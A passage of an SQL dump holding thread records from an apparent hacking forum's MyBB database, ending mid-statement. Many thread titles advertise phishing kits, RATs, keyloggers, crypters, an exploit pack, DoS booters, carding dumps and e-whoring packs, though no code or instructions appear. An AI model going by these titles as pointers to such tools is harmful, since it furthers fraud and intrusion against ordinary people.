mybb_threads VALUES('107', '12', 'how to change the icon of an exe file using resource hacker', '0', '0', '0', '50', 'sana khan', '1344967490', '261', '1345143902', 'p420', '9', '20', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('108', '4', 'Hey all', '0', '0', '0', '53', 'sirchamp', '1344977474', '262', '1345183500', 'Sin Cara', '54', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('109', '4', 'Sin Cara Here', '0', '0', '0', '54', 'Sin Cara', '1344990993', '268', '1345049514', 't3h jok3r', '1', '30', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('110', '4', 'It\'s Baws...the Baws', '0', '0', '0', '55', 'Baws', '1344993153', '271', '1345431846', 'JakeUS', '20', '27', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('111', '29', 'MyFreeCams Model Registeration', '0', '0', '0', '1', 't3h jok3r', '1344993386', '274', '1345784926', 'Thunder™', '84', '31', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('112', '19', '[Junk]??? Ultimate Premium PPD Ebooks Give away ???', '0', '0', '0', '54', 'Sin Cara', '1345011546', '283', '1349309513', 'NXK', '61', '88', '23', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('113', '15', '?Auto Youtube viewer?', '0', '0', '0', '53', 'sirchamp', '1345025859', '286', '1346106053', 't3h jok3r', '1', '53', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('114', '19', '[Junk]Havij', '0', '0', '0', '53', 'sirchamp', '1345027702', '287', '1345059665', 't3h jok3r', '1', '20', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('115', '48', '[tut] How to Moderate LH as a MOD', '0', '0', '0', '1', 't3h jok3r', '1345052054', '290', '1350340504', '??????????¢™', '3', '24', '5', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('116', '43', '[tut] Creating a Kindle PID', '0', '0', '0', '1', 't3h jok3r', '1345061796', '294', '1346797731', 'Timmy', '5', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('117', '46', 'Facebook Phishin* Website [tut]with pictures', '0', '0', '0', '53', 'sirchamp', '1345062424', '296', '1349702699', 'Graycat', '225', '53', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('118', '19', '[Junk]Test son', '0', '0', '0', '1', 't3h jok3r', '1345062793', '297', '1345504689', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('119', '49', 'Disallowed Suggestions', '0', '0', '0', '1', 't3h jok3r', '1345063750', '300', '1345063750', 't3h jok3r', '1', '16', '0', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('120', '4', 'reloadz0r is here', '0', '0', '0', '62', 'R?????zo?', '1345064382', '301', '1345521263', 'JakeUS', '20', '29', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('121', '21', 'kurosaki\'s DOS Tool', '0', '0', '0', '1', 't3h jok3r', '1345064939', '302', '1346767456', 'W33D', '171', '33', '2', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('122', '24', '[tut] Increase your virtual RAM', '0', '0', '0', '1', 't3h jok3r', '1345065123', '304', '1345223197', 'HoverCatz', '67', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('123', '14', 'Top 10 free VPNs', '0', '0', '0', '7', 'Romdu62', '1345065242', '305', '1349527836', 'mothered', '205', '36', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('124', '2', 'Line break mycode', '0', '0', '0', '1', 't3h jok3r', '1345073427', '312', '1345133049', 't3h jok3r', '1', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('125', '29', '[ebook]How to talk to a Police Officer when in trouble[Whitehat]', '0', '0', '0', '1', 't3h jok3r', '1345075280', '313', '1346254192', 'TheOne™', '144', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('126', '15', 'Adf.ly Bot', '0', '0', '0', '53', 'sirchamp', '1345107167', '315', '1350747515', 'iTzIpod', '82', '52', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('127', '46', 'Will make you a phisher website with theme you request.', '0', '0', '0', '64', 'vlajke', '1345111892', '316', '1346725101', 't3h jok3r', '1', '66', '12', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('128', '19', '[Junk]MoneyBookers acc with ~100$ on it.', '0', '0', '0', '64', 'vlajke', '1345116640', '320', '1345142810', 't3h jok3r', '1', '11', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('129', '8', 'ss501 because i\'m stupid(korean)', '0', '0', '0', '50', 'sana khan', '1345135217', '324', '1345416771', 't3h jok3r', '1', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('130', '15', 'Skype IP Finder - FREE', '0', '0', '0', '67', 'HoverCatz', '1345135783', '325', '1346016634', 't3h jok3r', '1', '114', '15', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('131', '12', '[tut]How to change IP address within seconds.', '0', '0', '0', '9', 'p420', '1345144158', '335', '1345144158', 'p420', '9', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('132', '20', '[Forever FUD]No Dependency Crypter!', '0', '0', '0', '1', 't3h jok3r', '1345145205', '338', '1345506158', 't3h jok3r', '1', '29', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('133', '23', 'Online Scanners list', '0', '0', '0', '19', 'yazz', '1345145459', '339', '1345595162', 'NXK', '61', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('134', '47', 'Win $10 for referring people', '0', '0', '0', '1', 't3h jok3r', '1345151263', '341', '1346035044', 'iTzIpod', '82', '68', '12', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('135', '43', 'Astro Pid [free4all] mediafire', '0', '0', '0', '61', 'NXK', '1345180664', '345', '1345859018', 't3h jok3r', '1', '42', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('136', '53', '[Java] Minecraft Lastlogin Decrypter [Source]', '0', '0', '0', '54', 'Sin Cara', '1345183757', '353', '1345263363', 'Sin Cara', '54', '26', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('137', '13', '[TuT] How to exploit a vulnerable site', '0', '0', '0', '54', 'Sin Cara', '1345183925', '354', '1349480613', 'iTzIpod', '82', '33', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('138', '35', 'Make Cool Logo in just 20 sec....[HOT]', '0', '0', '0', '54', 'Sin Cara', '1345184294', '355', '1350186774', 'XxTREYZxX', '257', '28', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('139', '12', 'Get 60 Minutes skype credit FREE!', '0', '0', '0', '54', 'Sin Cara', '1345185208', '356', '1345856086', 'Sin Cara', '54', '47', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('140', '19', '[Junk]???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '0', '0', '54', 'Sin Cara', '1345186318', '357', '1345934849', 't3h jok3r', '1', '27', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('141', '9', '$30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '19', '0', '60', 'Linux', '1345224075', '368', '1346342033', 'BurnsH4X', '48', '53', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('142', '30', 'Blackshades RAT 5.0 Cracked', '0', '19', '0', '60', 'Linux', '1345224837', '369', '1345554308', 'HoverCatz', '67', '30', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('143', '21', 'Tiny flood', '0', '0', '0', '61', 'NXK', '1345231616', '372', '1345770206', 'Triple H', '4', '34', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('144', '21', 'HTTP bot pack [free direct link]', '0', '0', '0', '61', 'NXK', '1345231914', '373', '1345231914', 'NXK', '61', '25', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('145', '30', 'Stealers/Keyloggers', '0', '0', '0', '61', 'NXK', '1345232233', '374', '1345332603', 'NXK', '61', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('146', '29', 'se7en sins PREMIUM SECTION', '0', '0', '0', '61', 'NXK', '1345232533', '375', '1345557294', 'iTzIpod', '82', '29', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('147', '42', '[Hacker news] BOTNET -The hacker news magazine', '0', '0', '0', '61', 'NXK', '1345248954', '390', '1345498674', 't3h jok3r', '1', '16', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('148', '12', '[Tutorial]How to use Cookies and access Premium Accounts', '0', '0', '0', '54', 'Sin Cara', '1345268116', '395', '1345717785', 'Sin Cara', '54', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('149', '12', 'How to crack your Internet Download Manager forever', '0', '0', '0', '54', 'Sin Cara', '1345268332', '396', '1345722491', 'Sin Cara', '54', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('150', '12', '[TuT] Easiest Way To Portfoward (For RAT\'s)', '0', '0', '0', '54', 'Sin Cara', '1345282396', '398', '1345720070', 'Sin Cara', '54', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('151', '24', 'Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '0', '0', '54', 'Sin Cara', '1345282815', '399', '1345782459', 'Sin Cara', '54', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('152', '30', '[Free] Magic Traffic Bot! [Worth $29.99]', '0', '0', '0', '54', 'Sin Cara', '1345283359', '400', '1345984409', 'Sin Cara', '54', '39', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('153', '34', '[TUT] How to Render SMOKE and FIRE in Seconds', '0', '0', '0', '54', 'Sin Cara', '1345283932', '401', '1350130517', 'XxTREYZxX', '257', '24', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('154', '19', '[Junk]New Logo', '0', '0', '0', '1', 't3h jok3r', '1345330348', '418', '1345330570', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('155', '3', '[Admin]?????? demoted', '0', '0', '0', '1', 't3h jok3r', '1345416216', '434', '1345554495', 't3h jok3r', '1', '25', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('156', '13', '[tut]View/Download SQL DB', '0', '0', '0', '4', 'Triple H', '1345422231', '449', '1346971441', 'unixmoon', '13', '15', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('157', '15', 'Eleonore Exp 1.2 Expliot pack', '0', '0', '0', '61', 'NXK', '1345439008', '453', '1345595502', 't3h jok3r', '1', '37', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('158', '42', 'So ninja\'s DO exist?!', '0', '0', '0', '61', 'NXK', '1345478497', '460', '1345555006', 'iTzIpod', '82', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('159', '49', 'Editing Thread', '0', '0', '0', '53', 'sirchamp', '1345483110', '461', '1345498385', 't3h jok3r', '1', '14', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('160', '9', '$$$Sh@recash Moneymaking$$$', '0', '0', '0', '53', 'sirchamp', '1345486296', '462', '1345654461', 'iTzIpod', '82', '48', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('165', '5', 'Just did something', '0', '0', '0', '20', 'JakeUS', '1345521453', '492', '1345597603', 't3h jok3r', '1', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('161', '3', 'Congratz NXK', '0', '0', '0', '5', 'Timmy', '1345502850', '469', '1345589159', 'NXK', '61', '42', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('162', '7', 'Applying for that swag award ;)', '0', '0', '0', '61', 'NXK', '1345505359', '476', '1345559185', 'iTzIpod', '82', '39', '2', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('163', '30', '[REAL]Facebook Cracker', '0', '0', '0', '1', 't3h jok3r', '1345509386', '483', '1346073818', 't3h jok3r', '1', '32', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('164', '28', 'Experiences on your upgrade..', '0', '0', '0', '1', 't3h jok3r', '1345509447', '484', '1347717769', 'iTzIpod', '82', '73', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('166', '49', 'New userbars?', '0', '0', '0', '20', 'JakeUS', '1345521887', '493', '1345555500', 't3h jok3r', '1', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('167', '4', 'iTzIpod is here (:', '0', '7', '0', '82', 'iTzIpod', '1345522131', '494', '1345595552', 'iTzIpod', '82', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('168', '50', ':(', '0', '0', '0', '54', 'Sin Cara', '1345533202', '507', '1345569039', 'JakeUS', '20', '28', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('174', '3', 'Coders Group Released', '0', '0', '0', '1', 't3h jok3r', '1345589672', '576', '1345597536', 't3h jok3r', '1', '22', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('171', '8', 'What Genre do you listen to?', '0', '0', '0', '82', 'iTzIpod', '1345555795', '528', '1350235444', 'iTzIpod', '82', '60', '22', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('170', '19', '[Junk]Wu Transfer/Cvv/Skimmed Dumps/Bank Logins & Trfs', '0', '0', '0', '6', 'xlesnyx12', '1345550226', '512', '1345554199', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('172', '3', 'Awards', '0', '0', '0', '5', 'Timmy', '1345557112', '544', '1345557465', 't3h jok3r', '1', '11', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('173', '14', '[TUT] Staying Anonymous', '0', '0', '0', '54', 'Sin Cara', '1345562972', '568', '1345769858', 'Triple H', '4', '26', '2', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('175', '42', 'Is Apple really the most valuable company?', '0', '0', '0', '1', 't3h jok3r', '1345590755', '579', '1345768451', 'Timmy', '5', '14', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('176', '12', '[Tut]How trace an email', '0', '0', '0', '10', 'swa4567', '1345592325', '586', '1347214058', 'duhuh', '90', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('177', '12', '[tut]How to get the FBI login screen', '0', '0', '0', '10', 'swa4567', '1345592811', '587', '1352188865', 'HoverCatz', '67', '40', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('178', '16', 'Social Engineering Domain Companies', '0', '0', '0', '10', 'swa4567', '1345593910', '588', '1345593910', 'swa4567', '10', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('180', '20', '[Free]Saddam\'s Crypter VB.Net source and +19 more![No surveys]', '0', '0', '0', '17', 'khade009', '1345595411', '595', '1345595411', 'khade009', '17', '16', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('179', '34', '[tut] Multiple 3D text tutorials', '0', '0', '0', '1', 't3h jok3r', '1345595286', '593', '1345845786', 'HoverCatz', '67', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('181', '54', 'Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '0', '0', '1', 't3h jok3r', '1345596736', '605', '1345899596', 'Neal Caffrey', '119', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('182', '49', 'Upgraded Forum', '0', '0', '0', '82', 'iTzIpod', '1345647134', '619', '1345675832', 't3h jok3r', '1', '22', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('183', '54', '2x PlayBoy Premium', '0', '0', '0', '54', 'Sin Cara', '1345647979', '620', '1345860012', '??????Z', '112', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('184', '35', '[Video] I\'m a video editor!', '0', '8', '0', '61', 'NXK', '1345652411', '622', '1346032810', 'iTzIpod', '82', '41', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('185', '4', 'Hey', '0', '0', '0', '90', 'duhuh', '1345670869', '629', '1345689206', 'iTzIpod', '82', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('186', '16', 'SE razor?', '0', '0', '0', '90', 'duhuh', '1345678480', '638', '1346422829', 'iTzIpod', '82', '30', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('187', '3', 'Public Downloads?', '0', '0', '0', '1', 't3h jok3r', '1345678843', '640', '1345847679', 't3h jok3r', '1', '35', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('188', '59', 'MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '0', '2', '0', '90', 'duhuh', '1345679003', '641', '1345864305', 'KFallen', '101', '34', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('189', '49', 'Webmaster Section', '0', '0', '0', '54', 'Sin Cara', '1345720201', '652', '1345820324', 't3h jok3r', '1', '18', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('190', '56', 'Copy and paste game', '0', '0', '0', '61', 'NXK', '1345746025', '665', '1350789934', 't3h jok3r', '1', '451', '103', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('191', '15', 'ProDos v1.0', '0', '0', '0', '53', 'sirchamp', '1345746532', '666', '1346970950', 'spacefish36', '8', '119', '19', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('192', '49', '[Suggestion] Forum Games Section', '0', '0', '0', '82', 'iTzIpod', '1345749254', '667', '1345765315', 'NXK', '61', '16', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('193', '59', '150+ Free Hacking eBooks Collection', '0', '0', '0', '82', 'iTzIpod', '1345752929', '677', '1347650871', 'iTzIpod', '82', '38', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('194', '16', 'So i got this from redbull.', '0', '0', '0', '90', 'duhuh', '1345757587', '681', '1345771987', 'swa4567', '10', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('195', '39', '[Selling] Cheap Netflix Accounts', '0', '0', '0', '82', 'iTzIpod', '1345759118', '688', '1346458283', 'iTzIpod', '82', '41', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('196', '3', 'IMPORTANT ANNOUNCEMENT!!!', '0', '0', '0', '1', 't3h jok3r', '1345765632', '693', '1345853495', 't3h jok3r', '1', '48', '14', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('197', '56', '/me Thread', '0', '0', '0', '82', 'iTzIpod', '1345766578', '696', '1352597634', 'iTzIpod', '82', '188', '70', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('198', '21', '[Tutorial] Setting up your own web Booter[Source Included]', '0', '0', '0', '4', 'Triple H', '1345770454', '713', '1349751523', 'Triple H', '4', '36', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('199', '25', '[Guide]How to protect your identity[Well-detailed]', '0', '0', '0', '4', 'Triple H', '1345770762', '714', '1346181456', 'Baws', '55', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('200', '55', '[Request] Adobe Photoshop CS6 Portable', '0', '0', '0', '82', 'iTzIpod', '1345776608', '723', '1347481426', 'iTzIpod', '82', '34', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('201', '42', 'Lance armstrong stripped of 7 tour titles?', '0', '0', '0', '61', 'NXK', '1345783095', '727', '1345852575', 'NXK', '61', '23', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('202', '25', 'Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '0', '0', '54', 'Sin Cara', '1345783924', '728', '1345828423', 'Sin Cara', '54', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('205', '53', 'First Java Multiplayer \"Game\"', '0', '0', '0', '67', 'HoverCatz', '1345817135', '743', '1345833072', 'HoverCatz', '67', '24', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('203', '16', '[Limited] Free SEing Help', '0', '0', '0', '82', 'iTzIpod', '1345814261', '739', '1352038974', 'iTzIpod', '82', '49', '14', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('204', '29', '[FREE]Skype Resolver API', '0', '0', '0', '1', 't3h jok3r', '1345816344', '741', '1345847855', 't3h jok3r', '1', '25', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('206', '7', 'Apply for SWAG', '0', '0', '0', '67', 'HoverCatz', '1345823845', '769', '1345898916', 't3h jok3r', '1', '60', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('207', '3', 'Suggest awards and apply for awards', '0', '0', '0', '2', 'Apathy', '1345825880', '776', '1346079447', 'iTzIpod', '82', '54', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('208', '7', 'I m feeling happy ;)', '0', '0', '0', '54', 'Sin Cara', '1345831427', '788', '1345998440', 'sirchamp', '53', '35', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('209', '35', 'Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '0', '0', '82', 'iTzIpod', '1345848449', '819', '1351824006', 'Apathy', '2', '28', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('210', '3', 'Moved Successfully!!!', '0', '0', '0', '1', 't3h jok3r', '1345853465', '835', '1345951282', 'Apathy', '2', '29', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('211', '3', '[Announcement] Marketplace Removed', '0', '0', '0', '82', 'iTzIpod', '1345857526', '844', '1345858239', 't3h jok3r', '1', '24', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('212', '58', 'Official New Groups Questions, Inquires, Policies and More', '0', '0', '0', '1', 't3h jok3r', '1345858254', '849', '1351197735', 'iTzIpod', '82', '408', '60', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('213', '58', 'What group(s) would you like to see?', '0', '0', '0', '20', 'JakeUS', '1345858295', '850', '1346078654', 'iTzIpod', '82', '43', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('214', '52', '[tut] Creating a IPod PID Generator', '0', '0', '0', '4', 'Triple H', '1345859244', '856', '1349730293', 'BreShiE', '232', '35', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('215', '52', 'Adf.ly BOT source code', '0', '0', '0', '4', 'Triple H', '1345859357', '857', '1346644540', 'spacefish36', '8', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('216', '52', 'Making a world wide SMS Bomber in VB.net - TUT', '0', '0', '0', '4', 'Triple H', '1345859626', '858', '1347237893', 'spacefish36', '8', '31', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('217', '24', '[Fun] Find the SEX of your Computer...!!', '0', '0', '0', '54', 'Sin Cara', '1345868433', '882', '1345945651', 'duhuh', '90', '21', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('218', '34', 'NEFantasy\'s #1 Graphic Pack (2.15 GB)', '0', '0', '0', '82', 'iTzIpod', '1345869611', '885', '1345869611', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('219', '35', 'My Designs', '0', '0', '0', '82', 'iTzIpod', '1345871321', '888', '1345952188', 'iTzIpod', '82', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('234', '17', 'Free E-Whoring packs website plus free PORN', '0', '0', '0', '1', 't3h jok3r', '1345938993', '977', '1352180743', 't3h jok3r', '1', '33', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('220', '55', 'Windows 7 Ultimate', '0', '0', '0', '112', '??????Z', '1345901648', '899', '1345984626', '??????Z', '112', '13', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('221', '7', 'L33t Hacking Advertisement Video', '0', '0', '0', '82', 'iTzIpod', '1345903215', '900', '1346015895', 't3h jok3r', '1', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('222', '34', 'Music Man Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345905811', '905', '1345905811', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('223', '34', 'Versus Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345906030', '906', '1345906030', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('224', '34', 'Metroid Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345906134', '907', '1345922749', 'iTzIpod', '82', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('225', '7', 'E-whoring Ebook very soon :)', '0', '0', '0', '54', 'Sin Cara', '1345908712', '914', '1345936454', 't3h jok3r', '1', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('226', '11', 'A Newbies Guide', '0', '0', '0', '54', 'Sin Cara', '1345910367', '919', '1350217502', 'mothered', '205', '35', '6', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('227', '13', 'hack twitter?', '0', '0', '0', '62', 'R?????zo?', '1345910796', '920', '1346417520', 'MinecraftGeek', '150', '26', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('228', '12', '[TUT] A complete guide to RAT', '0', '0', '0', '54', 'Sin Cara', '1345911097', '921', '1346471922', 'Apathy', '2', '32', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('229', '12', 'How to setup a Keylogger [tut]', '0', '0', '0', '53', 'sirchamp', '1345913509', '923', '1345939494', 't3h jok3r', '1', '30', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('230', '34', 'Graphics Resources [100000\'s of free resorces]', '0', '0', '0', '54', 'Sin Cara', '1345917649', '925', '1345956488', 'Sin Cara', '54', '27', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('231', '4', 'Sup', '0', '0', '0', '127', 'Eucliwood', '1345918274', '929', '1346039607', 'NXK', '61', '47', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('232', '50', 'Triple H', '0', '0', '0', '53', 'sirchamp', '1345927812', '949', '1346169647', 'JakeUS', '20', '15', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('233', 